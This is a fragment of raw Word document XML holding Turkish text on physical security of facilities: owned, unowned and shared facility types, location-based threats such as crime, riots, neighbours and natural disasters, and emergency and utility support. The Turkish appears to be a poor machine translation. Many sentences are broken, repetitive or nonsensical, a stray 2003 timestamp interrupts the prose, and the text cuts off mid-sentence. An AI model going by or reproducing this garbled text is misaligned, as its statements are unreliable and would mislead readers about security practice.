        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>laşma yollarını açıklamaktadır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Her biri için fiziksel güvenlik.</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1. Tesis Sınıflandırılması</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Tesisler aşağıdaki genel sınıflandırmalardan birine ayrılabilir:</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xml:space="preserve">• Sahip olunan tesis. Sahip olunan tesisler muhtemelen fiziksel güvenliği </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sağlamak için en basit yapıdır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tam idari kontrole sahip olan işgalciden dolayı güvenlik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yönetimi kolaylığı doğasındadır</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tesisin üzerinden. Bu, herhangi bir tür fiziksel güvenlik kontr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>olünü uygulamak için esnekliğin</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Herhangi bir şekilde, mal sahibi / mülk sahibi koruma hedeflerini gerçekleştirec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eğini düşünüyor. Bir ana çöküşü</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sahip olunan tesis, fiziksel güvenlik arızalandığında mal sahibinin / sahibinin tamamen soru</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mluluk alması gerektiğidir. bir</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sahip olunan bir tesise güzel bir örnek büyük bir şirket merkezidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0052228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Sahipsiz tesis. Sahipsiz tesisler fiziksel olarak korunma kon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usunda biraz daha zor olabilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> İşgalci ve mal sahibi, kendileri için</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sorumluluktan sorumlu olacak kendi sorumlul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uk listelerine sahip olacaktır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Güvenlik başarısız. Örneğin, bir su borusu patlar ve bir bilgisayar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>odasını taşarsa, yolcu alabilir</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> mal sahibinin yeterli bir şekilde bakmadığı tespit edilirse tazm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inattan sorumlu olan mal sahibi</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tesisat. Bu durumda, sahiplenmemiş tesisler, başarısız olan fiziksel durumlar için yasal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>başvurunun avantajını sunabilir</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> güvenlik. Sahipsiz tesislere örnek olarak, binada yaşayan bir kiracıdır, ancak mülk sahibi değildir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00287391" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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Paylaşılan tesis. Paylaşılan tesisler, muhtemelen işgal edilebilecek tesislerin en çeşitliliği ve tehdididir, ancak yapıların çoğunu açıklarlar. Bu tesisler, bazı işgalcilerin muhtemelen rakip oldukları. Çünkü tesis he</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rkese eşit erişim sağlamalıdır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yolcular (belirli bölgelerde), fiziksel güvenlik çok zo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rlaşır. İyi paylaşılan örnekler</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tesisler birden fazla yolcu, merkez ofisler ve eş merkezler </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ile sahipsiz tesisler olabilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tesisleri sınıflandırırken, risk azaltma stratejisinin geliştirilmesinde ilk adım atılmaktadır. Belirli tesislerin doğasında o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>labilecek tehditleri anlayarak,</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> riskler. Bazı tesisler birden fazla sınıflandırma tanımına uyabile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ceğinden, bir kişi kesin olarak</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bu sınıflandırma şemasına uyma. O zaman bunun farkında olması gereken,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> herhangi bir yeni içsel güç ve</w:t>
      </w:r>
      <w:r w:rsidRPr="00522281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bu melez sınıfla</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rın yaratabileceği zayıflıklar.</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2. Tesis Lokasyonu</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Sadece birinin ne tür bir tesisi işgal ettiğiyle değil, aynı zamanda bulunduğu yerle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>de ilgilenmesi gerekir. Belirli</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> yerleşim diğerinden daha fazla tehdit barındırabilir. Aşağıda, ne zaman dikkate alınması gereken konum tabanl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ı bazı tehditler bulunmaktadır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tesis için bir alan seç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Suç, isyan ve terörle ilgili güvenlik açığı.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63002">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tesisin konumu bu faaliyetlerin sık</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ça kullanıldığı bir bölgedeyse</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>er yer için araştır</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ma suçu ve terör istatistikleri</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> düşünülüyor.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>18 Kasım 2003, Salı 10:03</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ğin ihlal edilme olasılığı artar. Örneğin, sık sık gösteriler veya isyanlar</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Bir tesis yakınında, bölgeyi tehdit edebilecek rastgele şiddet olaylarına (örneğin, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yangınlar, suç, vb.) girebilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tesis, çalışanları ve muhtemelen müşterileri. Bilgi gü</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>venliğinde bile, koruma ve</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ların güvenliği her zaman her şeyden önce gelmelid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tişik binalar ve işletmeler. Bu konu, daha önce tartışılan tesislerin s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ınıflandırılması ile ilgilidir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(özellikle ortak tesisler) ve önceki suç ve isyan güvenlik açığ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ı sorunu. Bu iyi bir uygulama</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> birinin komşusunun kim olduğunu ve ne yaptıklarını bilmek. Örneğin, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bir şirket bulmak istemeyebilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rakiplerin, nükleer santrallerin veya otoyol veya tren yol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>larının yanındaki veri merkezi.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tehlikeli kimyasal taşıma. Ayrıca, bu endişeler bağlı bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">alar hakkında akla geliyor. Ar </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fiziksel güvenlik kontrolleri sizinki kadar güçlü mü? Birisi içe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ri girerse tesise girebilir mi?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bitişik bir bina? Peki ya çatı? Bunların hepsi ne zaman b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">irinin aklında ön planda olmalı, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bir yer seç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cil destek desteği. Bu sadece acil deste</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>k almasının zamanı (yani, Ateş,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Polis ve sağlık personeli) tesise ulaşmak için. Sürüş</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> mesafesini ve mesafesini bilin</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(en yoğun trafik sırasında) acil destek merkezl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>erinden tesise. Bu bilgi sağlar</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> yalnızca tespit ve caydıracak deği</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>l, aynı zamanda geciktirecek ve</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> acil destek gelene kadar hasarı veya hasarı en aza indi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evresel destek. Çevresel destek, tesise hizmet eden temiz hava, su ve güçtü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Konumun tüm bu alanlarda büyüme için yer açtığından emin olun. Özellikle, yüksek kullanılabilirlik için</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tesislerinde iki ayrı elektrik şebekesinden çekilecek yerleri arayın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00287391"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oğal afetlere karşı güvenlik açığı. Doğal desenler için yerel jeolojik ve hava durum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u istatistiklerini kontrol eden son</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 100 yıldır tercih edilen yerlerde felaketler. Verilen, doğal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">afetler tahmin edilemez </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ya da tamamen kaçınılması, ancak böyle felaketlerin olduğu bir yer seçer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ek etkilerini en aza indirgemek gerçekleşmesi daha az olası.</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3. Fasite Tehditleri ve Kontrol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Bir önceki tartışmaya göre, belirli konumların nasıl daha fazla veya daha az tehdit oluşturabilece</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ğini görüyoruz. Ne takip ediyor </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>işte temel biçimlerindeki tehdit ve kontrollerin listesi. Bu, birinin bir tehdidi ortadan kald</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ırabileceğini göstermek içindir </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kökünden biri, birkaç kişiyi aynı anda etkili bir şekilde ortadan kaldırabilir. Ancak bunun tersi de dikkat edin</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r tehdit diğerini gösterdiğinde olabilir. Kontroller do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ğada basit ve basit, ancak </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
